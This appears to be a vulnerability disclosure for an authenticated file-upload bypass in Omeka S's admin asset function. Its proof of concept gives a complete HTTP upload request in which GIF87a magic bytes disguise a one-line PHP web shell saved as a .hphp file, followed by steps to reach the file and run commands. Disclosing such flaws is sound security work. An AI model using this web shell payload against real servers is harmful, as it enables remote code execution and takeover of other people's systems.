Description

The upload file function is vulnerable that user can upload the file with other extensions (.php, .phps, …) by using Magic Bytes technique. However, the .htaccess has almost prevented all the files with extensions such as php, phps, phtml, …
The attacker still can upload the hphp file and then execute code from a remote machine.

Condition

The Apache server which is hosting the web application need to have the ability to execute the hphp file

Proof of Concept

Step 1: Login and go to the function that allows uploading, intercept the request, and modify as below

POST /omeka-s/admin/asset/add HTTP/1.1
Host: localhost
Content-Length: 344
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="104"
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9KHufs2z61gFOMA6
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/omeka-s/admin/asset
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: b8bc1e26ae4f54844a68a1cc98faa75a=lner6c64iimgk1pj70i6ikanpi
Connection: close

------WebKitFormBoundary9KHufs2z61gFOMA6
Content-Disposition: form-data; name="file"; filename="shell_php.hphp"
Content-Type: application/octet-stream

GIF87a <?php echo system($_REQUEST['cmd']);?>
------WebKitFormBoundary9KHufs2z61gFOMA6
Content-Disposition: form-data; name="o:alt_text"


------WebKitFormBoundary9KHufs2z61gFOMA6--

With the Magic Bytes GIF87a, the attacker has bypassed the file check, and then he can upload the file (.hphp) which is not in the whitelist.

Step 2: Check the file path

Step 3: Access the file path and execute commands